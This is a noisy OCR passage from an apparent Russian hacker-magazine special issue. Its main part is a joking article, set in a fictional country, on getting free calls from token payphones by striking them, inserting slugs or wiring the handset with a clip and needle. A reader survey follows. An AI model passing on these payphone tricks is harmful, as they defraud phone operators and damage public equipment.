когда не била утюгом! Никогда! Никогда! 
Слышите, я вам говорю!". :) 
Неразговорчивые? Ну, это вообще не в те- 
му. Как раз после 4-х часового молчания 
перед монитором и хочется потрепаться с 
кем-нибудь. 


В принципе таких мифов хватит на целую 
энциклопедию. Конечно же, я не буду их 
все описывать. Цель здесь другая: пока- 
зать тебе, что не все так, как тебе пытают- 
ся внушить окружающие. Не верь общес- 
твенному мнению, верь своему личному 
опыту. Ломай стереотипы! 
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ак известно, Бутаритари - маленькая 
к островная страна. За пару часов мож- 

но пешком дотопать в любую точку 
бутаритарского пространства. Но, как ты уже 
знаешь, там есть метро. Все это от страшной 
лени: жители очень ленивы, и им в лом куда- 
либо вообще ходить. С таксофонами точно та- 
кая же история. На каждом углу по таксофо- 
ну, хотя вполне можно и так доораться. 
Воистину, ЛЕНЬ есть оптимальное состояние 
сознания. И жители Бутаритари были бы 
близки к совершенству, если бы не страшная 
любовь к халяве и страшное отвращение к 
мату. Научно технический прогресс и куль- 
турное сознание нации, как известно, тормо- 
зят нюансы - вот об этом мы и поговорим. 


Способ первый (обезьяний) 


Ох уж эти наши не столь отдаленные род- 
ственники! Отдельные экземпляры, набрав на 
жетонном автомате номер и дождавшись от- 
вета, лупят по аппарату своими волосатыми 
руками. В результате этого вандализма элек- 
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тромеханическая часть приемника жетонов 
срабатывает, и обезьян получает возможнос- 
ть совершенно бесплатно произнести в труб- 
ку свое проникновенное “Ы”. Несмотря на то, 
что некоторые говорят в трубку “У”, такие ме- 
тоды часто заканчиваются поломкой. 


Способ второй (мусор) 


Более развитые представители ветви прима- 
тов предпочитают засовывать вместо жетонов 
в автомат: крышечки от банок с Соса-Солой, 
пуговицы, монетки, картонки и фанерки. 
Наиболее продвинутые выпиливают из ор- 
гстекла язычок с закруглением на конце. Та- 
кую “звонилку” беспощадно запихивают в из- 
мученное чрево таксофона. И, конечно же, 
это приводит к поломке достаточно часто. 


Способ третий (провода) 
Наверное, этот способ изобрели сами бутари- 


тарские монтеры. Представители этого класса 
соединяют телефонный микрофон с корпусом 


автомата. На корпус вешается крокодильчик, 
а в мембрану втыкают иголку либо булавку. 
Слышно становится хуже, зато совершенно 
бесплатно. Кстати, это тоже очень вредно для 
аппарата. 


Способ четвертый (челове- 
ческий) 


Нормальные люди, которые не любят ломать 
таксофоны, просто орут в наушник. Дело в 
том, что телефонный наушник тоже может ра- 
ботать как микрофон, только хуже слышно. 
Таким образом общаться надо по очереди: 
сначала слушаешь, что там скажут, а потом 
орешь в наушник. 

Кроме халявщиков, которые не хотят платить 
за разговор, есть еще и люди, которые зара- 
батывают на таксофонах деньги. Они просто 
дают за деньги позвонить по своей карте. Но 
жетонные таксофоны им мешают, и поэтому 
их ломают. Иногда жетонник “сломан” только 
для виду: на нем стоит табличка “не рабо- 
тает” либо под рычаг подложена бумажка. 
Словом, бутамилиция и работники БТС от все- 
го этого криминала не в восторге и могут здо- 
рово оштрафовать. Кроме того, ходят слухи, 
что скоро автоматы оборудуют сигнализа- 
цией. При любых противоправных действиях 
автомат будет орать как резаный. 


'Звонилка 


провод 


игла 


кракодил 


Так что главное в этой таксофонной 
войне - не стать жертвой. 


АНКЕТА 


Ты в каком городе живешь? 
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0 Муж 
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Твой возраст: 
С 14-17 

С 18-23 

С 24-30 

[С] старше 30 


Твое основное занятие: 
0 Учусь 

[1] Денежку зарабатываю 
С] Ничего не делаю 


Есть ли у тебя выход 
в Интернет? 

С] Да 

О] нет 


А сколько времени ты 

в Интернете проводишь 
ежедневно? 

СО 20-30 минут 

С] Не более часа 

[С] Несколько часов 
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Приходилось ли тебе 
пользовать чужие пароли, 
троянить друзей, хакать 
чужие компы? 


С] Да 

С] Нет 
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Ты собираешь супер-девайсы 
доктора Добрянского? 

O Да 

С] Нет 


Тебе нравятся конкурсы 
в журнале? 

Плдто! 

[С He, ни фига. 


Как тебе 

этот спецвыпуск Х? 
[С] отличный 

[] Хороший 

C Так себе 


Какая статья в этом 
спецвыпуске тебе 


понравилась больше всего? 
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Сколько народу, 

кроме тебя читает 

твой номер Х? 

О 1-3 

[] всей толпой 

[С] никто, я его один читаю 


Спецвыпуск с СО-ромом — 
это прикольно? 

Еда, супер 

[С] Дороговато 

0 Нафиг мне такой сидюк не 
нужен 
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Чему должен 
быть посвящен 
следующий 
спецвыпуск Х? 
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